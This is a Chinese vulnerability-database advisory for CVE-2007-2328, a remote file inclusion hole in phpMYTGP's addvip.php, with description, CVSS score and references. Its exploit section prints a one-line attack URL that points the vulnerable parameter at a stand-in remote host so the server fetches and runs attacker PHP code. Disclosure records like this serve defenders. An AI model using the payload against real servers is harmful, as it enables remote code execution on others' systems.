phpMYTGP 'addvip.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190809 漏洞类型 未知
发布时间 2007-04-26 更新时间 2007-04-26
CVE编号 CVE-2007-2328 CNNVD-ID CNNVD-200704-554
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86226
https://cxsecurity.com/issue/WLB-2007040143
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-554
|漏洞详情
phpMYTGP的addvip.php中存在PHP远程文件包含漏洞。远程攻击者可以借助msetstr[PROGSDIR]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
+++++++
name & version :phpMYTGP & v1.4b
vendor: www.allthescripts.com/page-207.htm
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,farzad
exploit : http://victim/addvip.php?msetstr["PROGSDIR"]=http://shell
++++++
|受影响的产品
Phpmytgp Phpmytgp 1.4B
|参考资料

来源:BUGTRAQ
名称:20070425phpMYTGPvv1.4b>>RFI
链接:http://www.securityfocus.com/archive/1/archive/1/466845/100/0/threaded
来源:OSVDB
名称:34161
链接:http://osvdb.org/34161
来源:XF
名称:phpmytgp-addvip-file-include(33880)
链接:http://xforce.iss.net/xforce/xfdb/33880
来源:SREASON
名称:2636
链接:http://securityreason.com/securityalert/2636